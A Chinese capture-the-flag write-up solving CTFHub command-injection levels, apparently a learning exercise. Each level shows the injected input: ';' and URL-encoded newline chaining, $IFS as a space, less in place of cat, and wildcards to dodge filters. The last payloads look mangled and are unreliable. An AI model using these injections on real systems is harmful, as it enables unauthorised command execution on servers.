ctfhub＞命令注入练习

ctfhub-web练习–>各种绕过

1.这题没有任何过滤

直接127.0.0.1;ls获取目录&＃xff0c;找到flag&＃xff0c;然后cat

flag在注释里面。
2.这题过滤了cat

百度下php类cat方法&＃xff1a;

127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag

3.过滤空格

用$IFS绕过127.0.0.1;cat${IFS}flag_1630334994276.php

4.过滤目录分隔符
先看看目录
127.0.0.1;ls
然后看看flag_is_here目录里面有什么
127.0.0.1;ls flag_is_here

有flag&＃xff0c;但是不在当前目录下&＃xff0c;所以切换目录就行了
127.0.0.1;cd \flag_is_here;cat flag_160862057427113.php
5.过滤运算符

过滤了| 和&
但是没有过滤 ; …
送分题
;ls;cat flag_17341506416268.php

6.组合拳
过滤了|&＃xff0c;&&＃xff0c;&＃xff1b;&＃xff0c;空格&＃xff0c;cat&＃xff0c;flag&＃xff0c;ctfhub
这能难到我吗&＃xff1f;&＃xff1f;&＃xff1f;
综合前面的
${IFS} -->空格
%0a(换行) --> ;
less --> cat
而且在url中提交才行
因为在输入框中提交会再进行url编码&＃xff0c;意思就不是我们想要的了
先127.0.0.1%0als#看看目录

再127.0.0.1%0als${IFS}fla*#
看看有啥玩意

因为过滤了flag&＃xff0c;所以要用fla*
然后127.0.0.1%0acd$IFSfla\ast${IFS}fla*.php#获取flag

简便方法&＃xff1a;
127.0.0.1%0acd$IFSfla\ast${IFS}*.php#
因为根据前面几题都知道目录和flag都叫什么类型的名字了。。。。。。。